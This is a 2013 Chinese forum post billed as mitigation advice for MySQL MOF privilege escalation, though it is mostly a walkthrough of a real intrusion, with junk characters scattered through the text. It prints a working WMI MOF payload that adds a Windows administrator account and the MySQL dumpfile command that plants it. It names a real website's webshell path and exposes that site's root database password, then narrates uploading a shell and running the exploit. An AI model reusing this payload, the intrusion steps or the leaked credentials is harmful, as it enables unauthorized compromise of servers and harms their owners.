Mysql mof扩展漏洞防范方法
4 o7 {! q+ L+ G8 ~6 v9 W& c
& E/ Q+ r% r" e: d' u网上公开的一些利用代码:
- U, o6 v$ \! ^$ D$ U' l+ ~; r; F2 h, u
#pragma namespace(“\\\\.\\root\\subscription”)
! Y0 R4 T; I2 f" G& H
0 Q$ I+ L$ `, @3 @# _$ tinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };) ?* L1 v' X3 |% N% H
( Z+ c" U) F7 S9 w1 h ; ]# h0 G* ^7 D* y
9 }8 u9 ]; H% q1 U 8 w6 j/ L) H1 o9 @0 U$ R& L: Y* d& V
2 ~, s8 L( d& E# K; K9 k7 f+ p
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;6 p( A4 z* P% |- u
从上面代码来看得出解决办法:
. y+ I2 l( j: D& A! a" s6 D. W6 k7 `0 z; E, B
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
. h* r: g" ~! q% W. Q s4 X7 ]2 E5 b, x
2、禁止使用”WScript.Shel”组件- u- J: t) C: B" m$ l
" @! J8 k: t% |5 ?2 m3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER2 r+ l/ q9 G8 }. M4 w
/ J* J9 ?% ^" s2 j. h当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
d$ A* j$ @/ o* z1 C1 w [$ V
" U1 W6 C+ H/ O: O事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
( F3 b/ v; Q! w+ b0 p9 Z+ q# [! O$ U/ T6 }
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
; s; b C5 Q5 d- v1 Z
1 k2 ~7 ? M0 P: O/ h! B& a看懂了后就开始练手吧
0 [, v2 q, R/ T' [9 R( I) Q& A5 X
http://www.webbmw.com/config/config_ucenter.php 一句话 a
O$ U. }* ^8 \5 h3 |5 C2 @
" O) G5 X! D7 F+ [) w1 K$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。8 M" |2 N- y" ~: H6 W
+ f' y, Y' g9 V4 S* D8 I; l4 z; h于是直接用菜刀开搞7 H7 c# h! R9 g. U
) x& D/ o$ P& z; w上马先% q H! ~$ P( j% p+ H( o
- e R( ^/ `8 F# Z# g2 }5 ?. @既然有了那些账号 之类的 于是我们就执行吧…….: V) J3 R' Q* U# m9 u: g2 H
/ Z& D' P- A( ^% p) |4 r# L: \' [; s小小的说下
0 @7 K; J. i- v' H4 i3 ^( P9 \1 v4 O7 P: M
在这里第1次执行未成功 原因未知2 X% d" R0 S: U8 c+ A: Y
1 s5 z8 j; b& k8 z: ?" t0 X& v+ ~
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。0 v1 ]& A. V# s
0 D! i5 \2 V* E0 f2 G
#pragma namespace(“\\\\.\\root\\subscription”); N1 g+ m. |6 B" a) A
) F# A+ j8 |' Cinstance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
" J- Q7 y g2 m/ e; E$ p$ t$ m+ E7 D" c
我是将文件放到C:\WINDOWS\temp\1.mof; i# [3 ]3 H% \' O4 q( x& m3 F
/ ]% _# [2 }$ z% u: u所以我们就改下执行的代码
1 V; c; S! s0 m' v5 j4 p1 K/ L
+ z$ C8 g9 O2 Z8 o% L* H. }7 nselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;+ l, \6 O& k. J5 k
: }5 d3 u+ [4 W$ E9 k3 W |
; c/ e( ?1 ^- ]% @
7 w j- l$ q. T+ H但是 你会发现账号还是没有躺在那里。。( k" P+ ^$ m9 p5 y% C
" M% M6 Z7 o! x1 u* T
于是我就感觉蛋疼& Y' W# |$ B m
' D) H! l! G1 ]7 M
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
" P. [, V6 @# T, @, r5 t$ T4 O" ?( L& \; Q
) L) `/ i- T: B& I
5 t* ~5 G5 ?& _( n- C" m但是其他库均不成功…7 L+ V/ X# r p4 J4 [
# H i3 i5 ~* S) X9 {0 R
我就很费解呀 到底为什么不成功求大牛解答…" B1 J0 k3 f o% j2 F& t3 {
- {4 C4 T& W4 A+ t. ~$ Q5 z. Y
) f3 ^2 a' s; W, u8 s* z
" k1 f9 ]2 G* Z4 X4 i
|
发表于 2013-1-4 19:49:49
收藏
支持
反对